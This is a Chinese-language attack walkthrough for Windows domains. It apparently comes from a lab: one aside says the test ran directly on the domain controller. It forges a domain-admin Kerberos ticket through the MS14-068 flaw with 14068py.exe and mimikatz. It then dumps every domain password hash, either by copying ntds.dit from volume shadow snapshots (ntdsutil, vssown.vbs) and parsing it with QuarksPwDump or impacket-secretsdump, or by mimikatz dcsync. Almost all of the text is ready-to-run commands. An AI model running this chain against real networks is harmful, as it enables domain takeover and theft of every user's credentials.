利用過程
1.利用該漏洞僞裝票據
2.導出域hash值
3.破解利用hash值
一、利用漏洞僞裝票據
條件
知道域名,sid,並擁有一個域普通用戶的賬號密碼和知道域控的名稱
步驟
1.拿到一臺普通域用戶機器,獲取sid
whoami /all
2.域名,域控名獲取
域名獲取:
ipconfig /all
查詢域控:
net time /domain
3.上傳14068py.exe,命令行輸入命令進行票據僞裝,會在當前目錄下生成一個TGT文件
14068py.exe -u 域用戶全稱 -p "密碼" -s sid -d 域控名全稱
用戶全名爲:用戶名@域名
4.輸入klist purge可刪除所有票據
5.上傳mimikatz.exe,輸入命令使用剛纔僞裝的票據
mimikatz.exe "kerberos::ptc xxxxx" exit
xxxxx處替換剛纔生成的TGT文件名
6.輸入klist查看票據,替換成功
7.無需輸入密碼即可查看域控的c盤目錄,說明域管身份的票據僞裝成功
dir \\域控全稱\c$
二、導出域hash值
·獲取ntds.dit並分析獲得hash
思路
1.票據僞裝成功後遠程連接,利用計劃任務或遠程執行控制DC執行命令(此處實驗直接在dc進行,利用計劃任務或遠程執行控制DC執行命令點擊此處跳轉到詳細使用方法)
2.利用工具獲取、分析得到域hash值
1.獲取ntds.dit
1.1 利用ntdsutil(win8之後自帶)導出ntds.dit
1.1.1 交互式shell:
輸入ntdsutil進入交互式界面
輸入snapshot進入快照功能
將活動實例設置爲ntds
activate instance ntds
輸入create創建快照
將快照掛載到c盤,此時c盤就出現了一個和c盤內容一樣的快照,並且沒有被佔用
mount 快照名
退出ntdsutil,複製快照下的ntds.dit到指定路徑(離線分析還需要複製快照裏的Windows\System32\config\SYSTEM,在線分析省略)
copy C:\$SNAP_202003310959_VOLUMEC$\Windows\NTDS\ntds.dit c:\
再次進入ntdsutil的快照功能,刪除快照
ntdsutil
snapshot
unmount 快照名
1.1.2 非交互式shell:
輸入以下命令直接一次性創建快照並退出
ntdsutil snapshot "activate instance ntds" create quit quit
輸入以下命令掛載剛剛生成的快照
ntdsutil snapshot "mount 快照名" quit quit
複製快照下的ntds.dit到指定路徑(離線分析還需要複製快照裏的Windows\System32\config\SYSTEM,在線分析省略)
copy C:\$SNAP_202003311014_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds1.dit
刪除快照
ntdsutil snapshot "unmount 快照名" quit quit
1.2 vssown.vbs提取ntds.dit
上傳腳本並開始運行腳本
cscript vssown.vbs /start
查看運行狀態
cscript vssown.vbs /status
創建c盤的快照
cscript vssown.vbs /create C
查看快照信息
cscript vssown.vbs /list
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 即爲c盤快照的根目錄路
將快照裏的ntds.dit複製到當前目錄
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ntds.dit
將快照裏的SYSTEM複製到當前目錄(離線分析需要,在線分析省略)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM
刪除創建的快照
cscript vssown.vbs /delete *
停止腳本運行
cscript vssown.vbs /stop
2.分析ntds.dit
2.1 利用QuarkPwDump在線分析
上傳QuarkPwDump.exe到目標機c:/
輸入命令獲取ntds.dit裏的域用戶密碼
QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit路徑
2.2 利用kali裏的impacket-secretsdump離線分析
複製生成的ntds.dit和SYSTEM到kali
終端輸入命令破解ntds.dit
impacket-secretsdump -ntds ntds.dit -system SYSTEM local
·mimikatz提取hash
條件
獲取普通域成員機的shell即可
步驟
在上述14068僞裝票據的基礎上遠程連接dc
輸入mimikatz.exe進入軟件
提取指定域用戶的hash值
lsadump::dcsync /domain:域名 /user:用戶名 /csv